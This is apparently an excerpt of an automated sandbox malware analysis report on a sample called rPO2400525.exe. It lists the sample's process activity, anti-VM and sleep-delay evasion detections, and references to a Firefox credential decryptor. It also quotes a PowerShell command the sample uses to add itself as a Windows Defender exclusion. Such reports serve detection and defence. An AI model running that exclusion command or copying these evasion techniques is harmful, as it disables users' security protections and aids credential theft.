                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: rPO2400525.exe PID: 6200, type: MEMORYSTR
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 9E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 76A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 86A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 8860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 9860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: ADE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: BDE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 1380000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5634Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4036Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exe TID: 6612Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: rPO2400525.exe, 00000000.00000002.2083171797.0000000000A83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S)*
                Source: rPO2400525.exe, 00000005.00000002.3322690008.0000000001186000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.rPO2400525.exe.3639970.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO2400525.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeProcess created: C:\Users\user\Desktop\rPO2400525.exe "C:\Users\user\Desktop\rPO2400525.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Users\user\Desktop\rPO2400525.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\rPO2400525.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
